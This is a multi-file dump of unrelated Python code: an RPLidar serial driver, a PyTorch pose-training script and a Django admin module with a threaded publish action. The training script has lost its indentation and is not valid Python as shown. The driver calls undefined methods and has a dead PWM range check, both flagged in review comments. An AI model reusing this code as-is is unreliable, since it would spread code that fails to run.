        compute_metric, precompute_metric = metric_table[args.metric]
    else:
        print("Unsupported metric!")
        exit()
    global device
    device = args.device
    compute_wrapper(args, num_threads)
    print("Faber Powell python is at the end :)")
# Run the CLI only when executed as a script, not when imported.
if __name__== "__main__":
    main()
|
rplidar-save3.py | '''Simple and lightweight module for working with RPLidar rangefinder scanners.
Usage example:
>>> from rplidar import RPLidar
>>> lidar = RPLidar('/dev/ttyUSB0')
>>>
>>> info = lidar.get_info()
>>> print(info)
>>>
>>> health = lidar.get_health()
>>> print(health)
>>>
>>> for i, scan in enumerate(lidar.iter_scans()):
... print('%d: Got %d measurments' % (i, len(scan)))
... if i > 10:
... break
...
>>> lidar.stop()
>>> lidar.stop_motor()
>>> lidar.disconnect()
For additional information please refer to the RPLidar class documentation.
'''
# import logging
import sys
import time
import codecs
import serial
import struct
from struct import pack, unpack
from threading import Thread
# Request/response framing bytes of the RPLidar binary serial protocol.
SYNC_BYTE = b'\xA5'
SYNC_BYTE2 = b'\x5A'
# Single-byte command codes, sent after SYNC_BYTE.
GET_INFO_BYTE = b'\x50'
GET_HEALTH_BYTE = b'\x52'
STOP_BYTE = b'\x25'
RESET_BYTE = b'\x40'
SCAN_BYTE = b'\x20'
FORCE_SCAN_BYTE = b'\x21'
# Fixed sizes and data-type codes of the descriptor and data responses.
DESCRIPTOR_LEN = 7
INFO_LEN = 20
HEALTH_LEN = 3
INFO_TYPE = 4
HEALTH_TYPE = 6
SCAN_TYPE = 129
#Constants & Command to start A2 motor
MAX_MOTOR_PWM = 1023
DEFAULT_MOTOR_PWM = 660
SET_PWM_BYTE = b'\xF0'
# Health status codes returned by the GET_HEALTH command.
_HEALTH_STATUSES = {
    0: 'Good',
    1: 'Warning',
    2: 'Error',
}
# True under Python 3, where indexing bytes already yields ints (see _b2i).
PY3 = True if (int(sys.version[0]) == 3) else False
class RPLidarException(Exception):
    """Raised for protocol or serial-communication errors with the RPLidar."""
def _b2i(byte):
    """Return *byte* as an int (Python 2 yields 1-char strings when indexing bytes)."""
    if PY3:
        return byte
    return ord(byte)
# def _process_scan(raw):
# '''Processes input raw data and returns measurment data'''
# new_scan = bool(_b2i(raw[0]) & 0b1)
# inversed_new_scan = bool((_b2i(raw[0]) >> 1) & 0b1)
# quality = _b2i(raw[0]) >> 2
# if new_scan == inversed_new_scan:
# raise RPLidarException('New scan flags mismatch')
# check_bit = _b2i(raw[1]) & 0b1
# if check_bit != 1:
# raise RPLidarException('Check bit not equal to 1')
# angle = ((_b2i(raw[1]) >> 1) + (_b2i(raw[2]) << 7)) / 64.
# distance = (_b2i(raw[3]) + (_b2i(raw[4]) << 8)) / 4.
# return (new_scan, quality, angle, distance,)
class RPLidar(object):
    '''Class for communicating with RPLidar rangefinder scanners.

    This stripped-down variant no longer opens the port in __init__; the
    caller is expected to call open() and start() (which spawns a reader
    thread running update2) explicitly. Completed 360-degree scans are
    published in self.scan and consumed via get().
    '''
    # serial = None #: serial port connection
    # port = '' #: Serial port name, e.g. /dev/ttyUSB0
    # timeout = 1 #: Serial port timeout
    # motor = False #: Is motor running?
    # baudrate = 115200 #: Baudrate for serial port
    # def __init__(self, port, baudrate=115200, timeout=1, logger=None):
    def __init__(self, logger=None):
        '''Initialize RPLidar object for communicating with the sensor.
        Parameters
        ----------
        port : str
            Serial port name to which sensor is connected
        baudrate : int, optional
            Baudrate for serial connection (the default is 115200)
        timeout : float, optional
            Serial port connection timeout in seconds (the default is 1)
        logger : logging.Logger instance, optional
            Logger instance, if none is provided new instance is created
        '''
        # self.serial = None
        # self.port = port
        # self.baudrate = baudrate
        # self.timeout = timeout
        self.motor_running = False
        # if logger is None:
        #     logger = logging.getLogger(__name__)
        # self.logger = logger
        # self.open(port, baudrate, timeout)
        # self.start_motor()
        # One (angle, distance) slot per integer degree of the last scan.
        self.scan = [(0,0,)]*360
        self.shutdown = False
        self.new_scan = False
    def __del__(self):
        # Best-effort shutdown: stop the reader thread, the motor, and close
        # the port. NOTE(review): self.serial is only created by open(); if
        # open() was never called this raises AttributeError during GC.
        # self.stop()
        self.shutdown = True
        if self.serial:
            self.motor(False)
            time.sleep(1)
            self.close()
        print("bye")
    def start(self):
        # Spawn the background reader thread (daemon, so it dies with the
        # process) running the update2 state machine.
        self.shutdown = False
        t = Thread(target=self.update2, name="rplidar", args=())
        t.daemon = True
        t.start()
        return
    def open(self, port, baudrate=115200, timeout=1):
        '''Connects to the serial port with the name `self.port`. If it was
        connected to another serial port disconnects from it first.'''
        if self.serial:
            self.close()
        try:
            self.serial = serial.Serial(
                port,
                baudrate,
                parity=serial.PARITY_NONE,
                stopbits=serial.STOPBITS_ONE,
                timeout=timeout,
                dsrdtr=True)
            # self.serial = self.serial
        except serial.SerialException as err:
            raise RPLidarException('Failed: %s' % err)
        # self.reset()
    def close(self):
        '''Disconnects from the serial port'''
        self.stop()
        self.shutdown = True
        time.sleep(0.1)
        if self.serial.is_open:
            self.serial.close()
        self.serial = None
    def set_pwm(self, pwm):
        # Send the A2 SET_PWM command with an XOR checksum trailer.
        # NOTE(review): `0 > pwm > MAX_MOTOR_PWM` can never be True (a value
        # cannot be both negative and above the max) — the range check is
        # effectively dead; the commented assert above was the intent.
        # assert(0 <= pwm <= MAX_MOTOR_PWM)
        if 0 > pwm > MAX_MOTOR_PWM:
            print('invalid pwm')
        payload = struct.pack("<H", pwm) # little endian, unsigned short
        # self._send_payload_cmd(SET_PWM_BYTE, payload)
        cmd = SET_PWM_BYTE
        size = struct.pack('B', len(payload))
        req = SYNC_BYTE + cmd + size + payload
        checksum = 0
        for v in struct.unpack('B'*len(req), req):
            checksum ^= v
        req += struct.pack('B', checksum)
        self.serial.write(req)
    # def start_motor(self):
    #     '''Starts sensor motor'''
    #     if self.motor_running:
    #         return
    #     # self.logger.info('Starting motor')
    #     # For A1
    #     self.serial.dtr = False
    #     # For A2
    #     self.set_pwm(DEFAULT_MOTOR_PWM)
    #     self.motor_running = True
    #
    # def stop_motor(self):
    #     '''Stops sensor motor'''
    #     if not self.motor_running:
    #         return
    #     # self.logger.info('Stoping motor')
    #     # For A2
    #     self.set_pwm(0)
    #     time.sleep(.001)
    #     # For A1
    #     self.serial.dtr = True
    #     self.motor_running = False
    def motor(self, value):
        # Unified motor control: True starts it, False stops it, covering
        # both A1 (DTR line) and A2 (PWM command) models.
        if value:
            # if self.motor_running:
            #     return
            # For A1
            self.serial.dtr = False
            # For A2
            self.set_pwm(DEFAULT_MOTOR_PWM)
            # self.motor_running = True
        else:
            # if not self.motor_running:
            #     return
            # self.logger.info('Stoping motor')
            # For A2
            self.set_pwm(0)
            time.sleep(.001)
            # For A1
            self.serial.dtr = True
            # self.motor_running = False
    # def _send_payload_cmd(self, cmd, payload):
    #     '''Sends `cmd` command with `payload` to the sensor'''
    #     size = struct.pack('B', len(payload))
    #     req = SYNC_BYTE + cmd + size + payload
    #     checksum = 0
    #     for v in struct.unpack('B'*len(req), req):
    #         checksum ^= v
    #     req += struct.pack('B', checksum)
    #     self.serial.write(req)
    def info(self):
        '''Get device information
        Returns
        -------
        dict
            Dictionary with the sensor information
        '''
        msg = [0xA5, 0x50]
        dmsg = pack('2B', *msg)
        self.serial.write(dmsg)
        # self._send_cmd(GET_INFO_BYTE)
        # NOTE(review): _read_descriptor/_read_response are not defined in
        # this trimmed class — this method raises AttributeError if called.
        dsize, is_single, dtype = self._read_descriptor()
        if dsize != INFO_LEN:
            raise RPLidarException('Wrong get_info reply length')
        if not is_single:
            raise RPLidarException('Not a single response mode')
        if dtype != INFO_TYPE:
            raise RPLidarException('Wrong response data type')
        raw = self._read_response(dsize)
        d = unpack('20B', raw)
        # Serial number is reported as a hex string of the trailing bytes.
        serialnumber = codecs.encode(raw[4:], 'hex').upper()
        serialnumber = codecs.decode(serialnumber, 'ascii')
        # data = {
        #     'model': _b2i(raw[0]),
        #     'firmware': (_b2i(raw[2]), _b2i(raw[1])),
        #     'hardware': _b2i(raw[3]),
        #     'serialnumber': serialnumber,
        # }
        data = {
            'model': d[0],
            'firmware': (d[2], d[1]),
            'hardware': d[3],
            'serialnumber': serialnumber,
        }
        return data
    def health(self):
        '''Get device health state. When the core system detects some
        potential risk that may cause hardware failure in the future,
        the returned status value will be 'Warning'. But sensor can still work
        as normal. When sensor is in the Protection Stop state, the returned
        status value will be 'Error'. In case of warning or error statuses
        non-zero error code will be returned.
        Returns
        -------
        status : str
            'Good', 'Warning' or 'Error' statuses
        error_code : int
            The related error code that caused a warning/error.
        '''
        # NOTE(review): _send_cmd/_read_descriptor/_read_response are not
        # defined in this trimmed class — this method raises AttributeError.
        self._send_cmd(GET_HEALTH_BYTE)
        dsize, is_single, dtype = self._read_descriptor()
        if dsize != HEALTH_LEN:
            raise RPLidarException('Wrong get_info reply length')
        if not is_single:
            raise RPLidarException('Not a single response mode')
        if dtype != HEALTH_TYPE:
            raise RPLidarException('Wrong response data type')
        raw = self._read_response(dsize)
        status = _HEALTH_STATUSES[_b2i(raw[0])]
        error_code = (_b2i(raw[1]) << 8) + _b2i(raw[2])
        return status, error_code
    def stop(self):
        '''Stops scanning process, disables laser diode and the measurement
        system, moves sensor to the idle state.'''
        # self.logger.info('Stoping scanning')
        # self._send_cmd(STOP_BYTE)
        # time.sleep(.001)
        msg = [0xa5, 0x25]
        msg = pack('2B', *msg)
        self.serial.write(msg)
        time.sleep(0.1)
        self.motor(False)
        # self.clear_input()
        # self.serial.read_all()
    def reset(self):
        """
        Resets sensor core, reverting it to a similar state as it has
        just been powered up. Should return something like this:
        RP LIDAR System.
        Firmware Ver 1.24 - rc0, HW Ver 5
        Model: 18
        """
        msg = [0xa5, 0x40]
        msg = pack('2B', *msg)
        self.serial.write(msg)
        time.sleep(0.1)
        # data = self.serial.read(1024)  # first byte is 0xA5/165 and second is 0x40/64
        # offset = 0
        # # print(data)
        #
        # b = unpack('{}B'.format(len(data)), data)
        # # print(b)
        #
        # for i, p in enumerate(b):
        #     if p == 82 and b[i+1] == 80:
        #         offset = i
        # data = data[offset:]
        # # print('offset', offset)
        # # print('>> ',len(data))
        # print('reboot data[{}]========\n{}\n========================'.format(len(data), data.decode('utf8')))
        time.sleep(1)
    def get(self, max_buf_meas=500):
        '''Block until the reader thread publishes a fresh 360-degree scan,
        then return it.

        NOTE(review): the body below does not iterate measurements or use
        max_buf_meas — the original docstring was inherited from an
        iter_measurements API. Returns self.scan, a 360-entry list of
        (angle, distance) tuples.

        Parameters
        ----------
        max_buf_meas : int
            Unused; kept for backward compatibility with the old API.
        '''
        while not self.new_scan:
            time.sleep(0.001)
        self.new_scan = False
        return self.scan
    def update(self):
        # Legacy single-loop reader kept for reference; update2 is the live
        # path. NOTE(review): self.start_motor() is commented out above, so
        # calling this raises AttributeError.
        # max_buf_meas=500 # ??
        self.start_motor()
        self.reset()
        self.serial.reset_input_buffer()
        # Issue the SCAN command (0xA5 0x20).
        msg = [0xa5, 0x20]
        msg = pack('2B', *msg)
        self.serial.write(msg)
        time.sleep(0.001)
        self.scan = [(0,0,)]*360
        # done = False
        while not self.shutdown:
            raw = self.serial.read(1024)
            print('read', len(raw))
            data = unpack('{}B'.format(len(raw)), raw)
            offset = 0
            # print('data', data)
            while len(data[offset:]) >= 12:
                # Scan-response descriptor: A5 5A 05 00 00 40 81.
                if data[offset:offset+7] == (0xa5,0x5a,0x05,0,0,0x40,0x81,):
                    print("==[header found]==")
                    offset += 7
                    size_pkt = len(data[offset:])
                    # 5-byte measurement packets follow the descriptor.
                    while (offset + 5) <= size_pkt:
                        pkt = data[offset:offset+5]
                        start = ((1 & pkt[0]) == 1)
                        if start:
                            print("====[start]==================================")
                        q = (pkt[0] >> 2)
                        angle = ((pkt[2] << 7) + (pkt[1] >> 1))/64
                        dist = (pkt[4] << 8) + pkt[3]
                        offset += 5
                        print('range',angle, dist, q)
                else:
                    # print([hex(x) for x in data[offset:offset+7]])
                    offset += 1
        print('buffer clear')
    def getscan(self, data):
        """
        Once the header packet is found, this functions pulls the measurements
        until it runs out of usable bytes.
        return: left over bytes
        """
        offset = 0
        len_data = len(data)
        while (offset + 5) <= len_data:
            pkt = data[offset:offset+5]
            # Bit 0 of the first byte flags the start of a new revolution.
            start = ((1 & pkt[0]) == 1)
            if start:
                print("====[start]==================================")
                # New revolution: reset the slot table and publish the flag.
                self.scan = [(0,0,)]*360
                self.new_scan = True
            # Integrity check: bit 1 must be the inverse of the start bit.
            chkS = (((pkt[0] & 2) >> 1) != (1 & pkt[0]))
            if not chkS:
                # print(((pkt[0] & 2) >> 1))
                # print(1 & pkt[0])
                # raise Exception('S')
                print('S')
                offset += 5
                continue
            # Check bit: bit 0 of the second byte must be set.
            if not (pkt[1] & 1):
                # raise Exception('C')
                print('C')
                offset += 5
                continue
            q = (pkt[0] >> 2)                              # quality (unused below)
            angle = ((pkt[2] << 7) + (pkt[1] >> 1))/64     # degrees
            dist = ((pkt[4] << 8) + pkt[3])/4 # mm
            offset += 5
            # print('range',angle, dist, q)
            self.scan[int(angle)] = (angle, dist)
        return data[offset:]
    def update2(self):
        # Reader-thread main loop: start the motor, request a scan, hunt for
        # the 7-byte response descriptor, then stream 5-byte measurement
        # packets into getscan() until shutdown is requested.
        # max_buf_meas=500 # ??
        self.motor(True)
        self.reset()
        self.serial.reset_input_buffer()
        # Issue the SCAN command (0xA5 0x20).
        msg = [0xa5, 0x20]
        msg = pack('2B', *msg)
        self.serial.write(msg)
        time.sleep(0.001)
        self.scan = [(0,0,)]*360
        # done = False
        raw = self.serial.read(1024)
        print('read', len(raw))
        data = unpack('{}B'.format(len(raw)), raw)
        offset = 0
        data_len = len(data)
        # find header
        while True:
            # Scan-response descriptor: A5 5A 05 00 00 40 81.
            if data[offset:offset+7] == (0xa5,0x5a,0x05,0,0,0x40,0x81,):
                print("==[header found]==")
                offset += 7
                break
            # print([hex(x) for x in data[offset:offset+7]])
            offset += 1
            if (offset+7) > data_len:
                # Ran out of bytes without a header: re-issue the SCAN
                # command and refill the buffer.
                print('offset', offset, 'send scan again')
                # raise Exception("out of data")
                msg = [0xa5, 0x20]
                msg = pack('2B', *msg)
                self.serial.write(msg)
                time.sleep(0.001)
                raw = self.serial.read(1024)
                print('read', len(raw))
                data = unpack('{}B'.format(len(raw)), raw)
                offset = 0
                data_len = len(data)
        # get scan packets
        while not self.shutdown:
            # Parse what we have; carry unconsumed trailing bytes forward.
            rest = self.getscan(data[offset:])
            raw = self.serial.read(1024)
            print('read', len(raw))
            data = rest + unpack('{}B'.format(len(raw)), raw)
            offset = 0
        print('buffer clear')
|
train_viewpose.py | import matplotlib
matplotlib.use('Agg')
import os
from os.path import join
import argparse
import torch
import numpy as np
import pickle
import sys
import datetime
sys.path.append('./utils')
from torch import optim
from torch import nn
from torch import multiprocessing
from torch.optim import lr_scheduler
from torch.autograd import Variable
from torch.utils.data import DataLoader, ConcatDataset
from utils.builders import SingleViewDepthTripletBuilder, MultiViewDepthTripletBuilder, MultiViewTripletBuilder, SingleViewTripletBuilder
from utils.builder_utils import distance, Logger, ensure_folder, collate_fn, time_stamped
from utils.vocabulary import Vocabulary
from ipdb import set_trace
from sklearn.preprocessing import OneHotEncoder
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchvision import transforms
import torchvision.utils as vutils
import torchvision.models as models
from torchvision import datasets
from tensorboardX import SummaryWriter
import matplotlib.pyplot as plt
from shutil import copy2
import importlib
from pyquaternion import Quaternion
from models.pose_predictor_euler import define_model
from utils.plot_utils import plot_mean
from utils.rot_utils_old import create_rot_from_vector, rotationMatrixToEulerAngles, \
isRotationMatrix, eulerAnglesToRotationMatrix, \
norm_sincos, sincos2rotm
from utils.network_utils import loss_rotation, loss_euler_reparametrize, loss_axisangle, batch_size, apply,\
loss_quat, loss_quat_single, euler_XYZ_to_reparam
from utils.plot_utils import plot_mean
# Pin GPU enumeration to PCI bus order and restrict the visible devices.
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]= "1,2,3"
# Network input size (Inception-style 299x299).
IMAGE_SIZE = (299, 299)
NUM_VIEWS = 1
# Frames sampled per sequence when a builder constructs a dataset.
SAMPLE_SIZE = 30
# Sequences used for the validation set / per training epoch.
VAL_SEQS = 5
TRAIN_SEQS_PER_EPOCH = 50
# Training loss: reparametrised Euler-angle regression.
LOSS_FN = loss_euler_reparametrize
EXP_ROOT_DIR = '/media/hdd/msieb/data/tcn_data/experiments'
sys.path.append(EXP_ROOT_DIR)
class Trainer(object):
def __init__(self, use_cuda, load_model, model_folder, train_directory, validation_directory, builder, loss_fn, args, multi_gpu=True):
self.use_cuda = use_cuda
self.load_model = load_model
self.model_folder = model_folder
self.validation_directory = validation_directory
self.train_directory = train_directory
self.args = args
self.builder = builder
self.loss_fn = loss_fn
self.logdir = join(model_folder, 'logs')
self.writer = SummaryWriter(self.logdir)
self.logger = Logger(self.args.log_file)
self.itr = 0
# Create Model
self.model = self.create_model()
if multi_gpu:
self.model = torch.nn.DataParallel(self.model, device_ids=range(torch.cuda.device_count()))
# Build validation set
validation_builder = builder(self.args.n_views, validation_directory, IMAGE_SIZE, self.args, sample_size=SAMPLE_SIZE)
validation_set = [validation_builder.build_set() for i in range(VAL_SEQS)]
validation_set = ConcatDataset(validation_set)
self.len_validation_set = len(validation_set)
del validation_builder
self.validation_loader = DataLoader(
validation_set,
batch_size=8,
shuffle=False,
pin_memory=self.use_cuda,
)
self.validation_calls = 0
# Build Training Set
self.triplet_builder = builder(self.args.n_views, \
train_directory, IMAGE_SIZE, self.args, sample_size=SAMPLE_SIZE)
self.training_queue = multiprocessing.Queue(1)
dataset_builder_process = multiprocessing.Process(target=self.build_set, args=(self.training_queue, self.triplet_builder, self.logger), daemon=True)
dataset_builder_process.start()
# Get Logger
# Model specific setup
self.optimizer = optim.SGD(self.model.parameters(), lr=self.args.lr_start, momentum=0.9)
# This will diminish the learning rate at the milestones ///// 0.1, 0.01, 0.001 if not using automized scheduler
self.learning_rate_scheduler = lr_scheduler.ReduceLROnPlateau(self.optimizer, 'min')
# self.criterion = nn.CrossEntropyLoss()
def train(self):
trn_losses_ = []
val_losses_= []
val_acc_ = []
trn_acc_ = []
for epoch in range(self.args.start_epoch, self.args.start_epoch + self.args.epochs):
print("=" * 20)
self.logger.info("Starting epoch: {0} ".format(epoch))
dataset = self.training_queue.get()
data_loader = DataLoader(
dataset=dataset,
batch_size=self.args.minibatch_size, # batch_size(epoch, self.args.max_minibatch_size),
shuffle=True,
pin_memory=self.use_cuda,
)
train_embedding_features_buffer = []
train_images_buffer = []
correct = 0
for _ in range(0, 1):
losses = []
for minibatch in data_loader:
if self.use_cuda:
anchor_frames = minibatch[0].cuda()
#anchor_euler_reparam = minibatch[1].cuda() # load as 3x3 rotation matrix
anchor_rots = minibatch[1].cuda() # load as 3x3 rotation matrix
# frames = Variable(minibatch)
loss, a_pred = self.loss_fn(self.model, anchor_frames, anchor_rots)
losses.append(loss.data.cpu().numpy())
anchor_euler = euler_XYZ_to_reparam(apply(rotationMatrixToEulerAngles, anchor_rots))
correct += (torch.norm(a_pred - anchor_euler, 2) < 0.1).data.cpu().numpy().sum() # print(gradcheck(loss_fn, (tcn, minibatch,)))
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
# Add embeddings
train_embedding_features_buffer.append(apply(rotationMatrixToEulerAngles, anchor_rots))
train_images_buffer.append(anchor_frames)
print("logging to {}".format(self.logdir))
self.writer.add_scalar('data/train_loss', np.mean(losses), self.itr)
self.writer.add_scalar('data/train_correct', correct / len(data_loader), self.itr)
self.itr += 1
trn_losses_.append(np.mean(losses))
self.logger.info('train loss: ', np.mean(losses))
self.logger.info("Training score correct {correct}/{total}".format(
correct=correct,
total=len(data_loader)
))
trn_acc_.append(correct)
self.writer.add_image('frame_1', minibatch[0][0], self.itr)
# Get embeddings
features = torch.cat(train_embedding_features_buffer[:30]).squeeze_()
# features = train_embedding_features_buffer.view(train_embedding_features_buffer.shape[0]*train_embedding_features_buffer.shape[1], -1)
# label = torch.Tensor(np.asarray(label_buffer))
images = torch.cat(train_images_buffer[:30]).squeeze_()#/255.0, [0, 3, 1, 2]
self.writer.add_embedding(features, label_img=images, global_step=epoch)
if epoch % 1 == 0:
loss, correct = self.validate()
self.learning_rate_scheduler.step(loss)
val_losses_.append(loss)
val_acc_.append(correct)
if epoch % self.args.save_every == 0 and epoch != 0:
self.logger.info('Saving model.')
self.save_model(self.model, self.model_filename(self.args.model_name, epoch), join(self.model_folder, 'weight_files'))
print("logging to {}".format(self.logdir))
plot_mean(trn_losses_, self.model_folder, 'train_loss')
plot_mean(val_losses_, self.model_folder, 'validation_loss')
plot_mean(trn_acc_, self.model_folder, 'train_acc')
plot_mean(val_acc_, self.model_folder, 'validation_accuracy')
# plot_mean(val_acc_no_margin_, self.model_folder, 'validation_accuracy_no_margin')
def validate(self):
# Run model on validation data and log results
correct = 0
losses = []
for minibatch in self.validation_loader:
if self.use_cuda:
anchor_frames = minibatch[0].cuda()
#anchor_euler_reparam = minibatch[1].cuda() # load as 3x3 rotation matrix
anchor_rots = minibatch[1].cuda() # load as 3x3 rotation matrix
loss, a_pred = self.loss_fn(self.model, anchor_frames, anchor_rots)
losses.append(loss.data.cpu().numpy())
anchor_euler = euler_XYZ_to_reparam(apply(rotationMatrixToEulerAngles, anchor_rots))
correct += (torch.norm(a_pred - anchor_euler, 2) < 0.1).data.cpu().numpy().sum()
self.writer.add_scalar('data/valid_loss', np.mean(losses), self.validation_calls)
self.writer.add_scalar('data/validation_correct', correct / self.len_validation_set, self.validation_calls)
self.validation_calls += 1
loss = np.mean(losses)
self.logger.info("Validation score correct {correct}/{total}".format(
correct=correct,
total=self.len_validation_set
))
self.logger.info('val loss: ',loss)
return loss, correct
def model_filename(self, model_name, epoch):
return "{model_name}-epoch-{epoch}.pk".format(model_name=model_name, epoch=epoch)
def save_model(self, model, filename, model_folder):
ensure_folder(model_folder)
model_path = os.path.join(model_folder, filename)
torch.save(model.state_dict(), model_path)
def build_set(self, queue, triplet_builder, log):
while 1:
datasets = []
for i in range(TRAIN_SEQS_PER_EPOCH):
dataset = triplet_builder.build_set()
datasets.append(dataset)
dataset = ConcatDataset(datasets)
# log.info('Created {0} triplets'.format(len(dataset)))
queue.put(dataset)
def create_model(self):
model = define_model(pretrained=True)
# model = PosNet()
if self.load_model:
model_path = os.path.join(
self.model_folder,
self.load_model
)
# map_location allows us to load models trained on cuda to cpu.
model.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))
if self.use_cuda:
model = model.cuda()
return model
def batch_size(self, epoch, max_size):
    """Exponential schedule: batch size doubles every 100 epochs,
    clamped to the range [2, max_size]."""
    doublings = epoch // 100
    return min(max(2 ** doublings, 2), max_size)
def main(args):
    """Entry point: set up folders, data builder and loss, then train.

    Args:
        args: argparse.Namespace from the __main__ parser.
    """
    # module = importlib.import_module(args.exp_name + '.config')
    # conf = getattr(module, 'Config_Isaac_Server')()
    # EXP_DIR = conf.EXP_DIR
    # MODEL_FOLDER = conf.MODEL_FOLDER

    # GPU Configuration
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    use_cuda = torch.cuda.is_available()

    # Load model
    model_folder = join(EXP_ROOT_DIR, args.exp_name, 'trained_models', args.run_name, time_stamped())
    if not os.path.exists(model_folder):
        os.makedirs(model_folder)

    # Get data loader builder and loss function
    builder = getattr(importlib.import_module('utils.builders'), args.builder)
    loss_fn = LOSS_FN

    # Define train and validation directories
    train_directory = join(EXP_ROOT_DIR, args.exp_name, 'videos/train/')
    validation_directory = join(EXP_ROOT_DIR, args.exp_name, 'videos/valid/')

    # Copies of executed config.
    # FIX: use os.path.dirname instead of the fragile '/'-split/join, which
    # breaks on Windows paths; also hoist the repeated expression.
    script_dir = os.path.dirname(os.path.realpath(__file__))
    experiments_dir = os.path.join(script_dir, 'experiments')
    if not os.path.exists(experiments_dir):
        os.makedirs(experiments_dir)
    copy2(os.path.join(script_dir, 'train_tcn_no_captions.py'), model_folder)
    copy2(os.path.join(os.path.dirname(script_dir), 'gps-lfd', 'config.py'), model_folder)

    # Build training class
    trainer = Trainer(use_cuda, args.load_model, model_folder, train_directory, validation_directory, builder, loss_fn, args)
    trainer.train()
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # Training schedule / optimization parameters
    parser.add_argument('--start-epoch', type=int, default=0)
    parser.add_argument('--epochs', type=int, default=1000)
    parser.add_argument('--save-every', type=int, default=10)
    parser.add_argument('--load-model', type=str, required=False)
    parser.add_argument('--minibatch-size', type=int, default=8)
    parser.add_argument('--model-name', type=str, default='tcn')
    parser.add_argument('--log-file', type=str, default='./out.log')
    parser.add_argument('--lr-start', type=float, default=0.001)
    parser.add_argument('--n-views', type=int, default=NUM_VIEWS)
    parser.add_argument('--alpha', type=float, default=0.01, help='weighing factor of language loss to triplet loss')
    # Model parameters
    # Path parameters
    parser.add_argument('--exp-name', type=str, required=True)
    parser.add_argument('--run-name', type=str, required=True)
    parser.add_argument('--builder', type=str, required=True)
    args = parser.parse_args()
    print(args)
    main(args)
|
admin.py | from .models import *
from django.contrib import admin
from django.db.models import Q
from django.contrib.contenttypes.models import ContentType
from .views import *
from django import forms
#from django.contrib.admin.widgets import SelectWidget
from django.utils.safestring import mark_safe
from django.contrib import messages
from django.shortcuts import render
from django.http import HttpResponseRedirect, HttpResponse
class GenericMetaPropInline(admin.TabularInline):
    # Tabular inline for editing GenericMetaProp rows on a parent admin page.
    model = GenericMetaProp
    # readonly_fields = ('slug','created')
    #fields = ('code','namespace')
    # related_search_fields = {'label' : ('name','slug')}
    extra = 1  # one blank row offered by default
def publish_set_background(queryset, model, check, mode, logf):
    """Publish `queryset`, streaming HTML progress messages to `logf`.

    Intended to run in a daemon thread (see publish_set_action).

    Args:
        queryset: objects to publish.
        model: model name, used only to label the log.
        check: URI-check flag passed through to publish_set.
        mode: publish mode string, e.g. 'PUBLISH'.
        logf: path of the HTML log file to create.
    """
    # FIX: removed the unused `proclog = File(f)` wrapper and its
    # django.core.files import — the raw file handle is what gets written.
    import time
    with open(logf, 'w') as f:
        f.write("Publishing %s %ss in mode %s at %s<BR>" % (str(len(queryset)), model, mode, time.asctime()))
        for msg in publish_set(queryset, model, check, mode):
            # Highlight exception messages in the log.
            if msg.startswith("Exception"):
                em = "<strong>"
                emend = "</strong>"
            else:
                em = ""
                emend = ""
            f.write("".join(("<LI>", em, msg, emend, "</LI>")))
            f.flush()  # make progress visible to anyone tailing the log
        f.write("<BR> publish action finished at %s<BR>" % (time.asctime(),))
def publish_set_action(queryset, model, check=False, mode='PUBLISH'):
    """Start a background publish of `queryset` and return the log URL.

    Returns:
        URL (under /static/) of the HTML progress log being written.
    """
    import threading
    from django.conf import settings
    import os
    import time
    timestr = time.strftime("%Y%m%d-%H%M%S")
    logfname = '{}_batch_publish_{}.html'.format(model, timestr)
    # FIX: catch only the expected missing-setting error; the previous bare
    # `except:` also swallowed KeyboardInterrupt/SystemExit.
    try:
        logf = os.path.join(settings.BATCH_RDFPUB_LOG, logfname)
    except AttributeError:
        logf = os.path.join(settings.STATIC_ROOT if settings.STATIC_ROOT else '', logfname)
    t = threading.Thread(target=publish_set_background, args=(queryset, model, check, mode, logf), kwargs={})
    # FIX: Thread.setDaemon() is deprecated (Python 3.10+); set the attribute.
    t.daemon = True
    t.start()
    return "/static/" + logfname
def force_prefix_use(modeladmin, request, queryset):
    """ update selected Metaprops to use CURIE form with registered prefix """
    # Re-saving each object triggers the model's save() logic, which is
    # presumably where the CURIE normalisation happens — confirm in models.py.
    for obj in queryset.all():
        obj.save()
# Label shown in the admin actions dropdown.
force_prefix_use.short_description = "update selected Metaprops to use CURIE form with registered prefix"
class GenericMetaPropAdmin(admin.ModelAdmin):
    """Admin for generic metadata properties."""
    search_fields = ['propname']
    actions = [force_prefix_use]
    pass
class ObjectTypeAdmin(admin.ModelAdmin):
    """Default admin for ObjectType."""
    pass
class AttributeMappingInline(admin.TabularInline):
    # Tabular inline for AttributeMapping rows (used by ObjectMappingAdmin).
    model = AttributeMapping
    # readonly_fields = ('slug','created')
    #fields = ('code','namespace')
    # related_search_fields = {'label' : ('name','slug')}
    extra = 1
class EmbeddedMappingInline(admin.TabularInline):
    # Tabular inline for EmbeddedMapping rows (used by ObjectMappingAdmin).
    model = EmbeddedMapping
    # readonly_fields = ('slug','created')
    #fields = ('code','namespace')
    # related_search_fields = {'label' : ('name','slug')}
    extra = 1
class ChainedMappingInline(admin.TabularInline):
    # Inline for chained mappings; fk_name disambiguates the FK back to scope.
    model = ChainedMapping
    fk_name = 'scope'
    # readonly_fields = ('slug','created')
    fields = ('attr', 'predicate', 'chainedMapping')
    # related_search_fields = {'label' : ('name','slug')}
    extra = 1
class ObjectMappingAdmin(admin.ModelAdmin):
    """Admin for object mappings with attribute/chained/embedded inlines."""
    search_fields = ['content_type__name']
    inlines = [AttributeMappingInline, ChainedMappingInline, EmbeddedMappingInline]
    filter_horizontal = ('obj_type',)
    pass
class AttributeMappingAdmin(admin.ModelAdmin):
    """Default admin for AttributeMapping (registration commented out below)."""
    pass
class EmbeddedMappingAdmin(admin.ModelAdmin):
    """Default admin for EmbeddedMapping (registration commented out below)."""
    pass
class NamespaceAdmin(admin.ModelAdmin):
    """Admin for RDF namespaces (URI plus preferred prefix)."""
    list_display = ('uri', 'prefix', 'notes')
    fields = ('uri', 'prefix', 'notes')
    # FIX: search_fields was assigned twice (the second assignment silently
    # overwrote the first); keep a single definition.
    search_fields = ['uri', 'prefix']
    # related_search_fields = {'concept' : ('pref_label','definition')}
    #list_editable = ('name','slug')
class ConfigVarAdmin(admin.ModelAdmin):
    """Default admin for ConfigVar."""
    pass
